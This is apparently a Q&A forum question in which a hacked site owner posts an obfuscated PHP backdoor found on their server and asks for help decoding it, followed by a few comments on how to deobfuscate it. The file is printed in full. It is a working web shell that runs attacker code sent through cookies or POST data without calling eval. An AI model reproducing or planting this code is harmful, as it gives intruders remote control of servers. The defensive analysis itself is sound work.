2

Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and - even though I managed to beautify it - I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the $_POST and $_COOKIE variables, but what I find very interesting is the lack of any eval calls, the function is even deactivated in my php.ini.

Anyway here's the code and I'd appreciate any kind of insights:

<?php
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
$vcekj[] = $wldxznb[14] . $wldxznb[18];
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
$vcekj[] = $wldxznb[5];
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
foreach ($vcekj[8]($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
    function wwdlf($vcekj, $wxusr, $qwdotr)
    {
        return $vcekj[7]($vcekj[5]($wxusr . $vcekj[2], ($qwdotr / $vcekj[9]($wxusr)) + 1) , 0, $qwdotr);
    }
    function irngfrj($vcekj, $axsex)
    {
        return @$vcekj[10]($vcekj[1], $axsex);
    }
    function vadod($vcekj, $axsex)
    {
        $onlwwe = $vcekj[4]($axsex) % 3;
        if (!$onlwwe)
        {
            $zznqw = $vcekj[0];
            $juptpoi = $zznqw("", $axsex[1]($axsex[2]));
            $juptpoi();
            exit();
        }
    }
    $pjrusp = irngfrj($vcekj, $pjrusp);
    vadod($vcekj, $vcekj[6]($vcekj[3], $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj[9]($pjrusp))));
}
schroeder
  • 125,553
  • 55
  • 289
  • 326
  • Unfortunately, we are not a code analysis site or a deobfuscation service. – schroeder Sep 08 '21 at 10:32
  • 2
    It is pretty trivial to decode the massive array at the start. Use a sandbox to break it all up: http://sandbox.onlinephpfunctions.com/code/70ef936f4881289cf4783006fb924f5e57469425 – schroeder Sep 08 '21 at 10:38
  • 3
    @schroeder thank you for taking the time to point me to the right direction, despite my question being off-topic – JohnTheWalker Sep 08 '21 at 10:56
  • 2
    For this approach to obfuscation, once you decode the array, everything else is easy to sort out. You just need to "think like a compiler" and not get hung up on random strings. If it helps, replace the random strings with animal names to give your brain something to work with. – schroeder Sep 08 '21 at 11:00
  • 1
    @Anders ah! In my memory, we didn't have one for PHP, but my memory failed me. Thanks! – schroeder Sep 09 '21 at 08:29

0 Answers0